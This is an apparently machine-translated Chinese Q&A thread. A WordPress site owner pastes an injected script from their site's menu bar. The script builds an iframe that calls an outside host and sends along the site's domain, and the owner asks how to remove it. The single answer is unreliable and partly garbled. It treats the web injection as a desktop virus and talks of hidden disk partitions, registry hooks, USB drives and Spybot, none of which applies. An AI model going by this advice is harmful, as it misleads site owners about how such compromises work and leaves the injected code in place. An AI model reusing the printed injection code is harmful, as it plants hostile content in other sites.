Wordpress中的恶意脚本

Question

你好，我的网站上有恶意脚本，我无法在任何地方找到它！

我在检查检查，它返回：

<div id="menu-bar" style="position: fixed; width: 50px; transition: all 300ms ease; height: 100%; top: 0px; right: -50px;"><div id="fechar_aba"></div> 
<div id="abrir_aba"></div> 
<div class="handle"></div> 

<script type="text/javascript"> 
    var relatedUrl = document.domain; 
    var protocol = window.location.protocol; 


    var idadv = document.createElement("iframe"); 
    with(idadv){ 
     id = "idadv"; 
     src = protocol+"//braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&user=baixarfilme&url="+relatedUrl; 
     scrolling = "no"; 
    } 
    document.getElementById("menu-bar").appendChild(idadv); 
</script> 

<script type="text/javascript"> 
    $("#menu-bar").slideReveal({ 
     trigger: $(".handle"), 
     push: false, 
     position: "right", 
     width: 50, 
     show: function(slider, trigger){ 
     $('#menu-bar').css({"-webkit-box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)","box-shadow":"-1px 1px 3px 0px rgba(50, 50, 50, 0.3)"}); 
     }, 
     hidden: function(slider, trigger){ 
     $('#menu-bar').css({"-webkit-box-shadow":"none","box-shadow":"none"}); 
     }, 
    }); 

</script><iframe id="idadv" src="https://braip.com.br/wp-feed/2016/gondran/top10.php?modelo=2016&amp;user=baixarfilme&amp;url=www.websiteladies.com" scrolling="no"></iframe></div> 

它坐落在我的wordpress的“菜单栏”，但我到处都找不到的东西！这样，我的网站的SSL证书，使我的网站显示为我的客户的INSECURE！我不能相信 ！

这里是网址：http://www.websiteladies.com

任何帮助吗？

Answer 1

我自己有这个问题，它可能需要几个小时才能摆脱它。
它将采用JavaScript或jQuery格式或VBS格式，至少部分是。它可能在HDD或外部USB的顶端创建了自己的分区，因此请检查分区。

它会将自己的一部分附加到注册表中，以便它知道您何时搜索它，并且只要您在线就可以修复它自己。它可能已经开始作为一个根文件夹，将其自身附加到文本或照片文件。

尝试下载Spybot SD，然后脱机并安装并运行该程序。如果病毒创建了它自己的分区，您将不得不找到它并完成对该分区的擦除，然后对其进行设置，使其成为分区之前的分区的扩展。快速“快速清洁”不起作用，因为它只是清理扇区标记。

我知道没有杀毒软件或Spybot追踪器会隐藏分区，但它们可以清理注册表并找到隐藏的rootkit。
尝试记住您最近下载并安装的内容。
检查您插入的任何USB拇指驱动器。
我会建议保持离线状态，直到确定病毒的所有组件都没有了。我有一个隐藏在内部的一些组件的防病毒程序。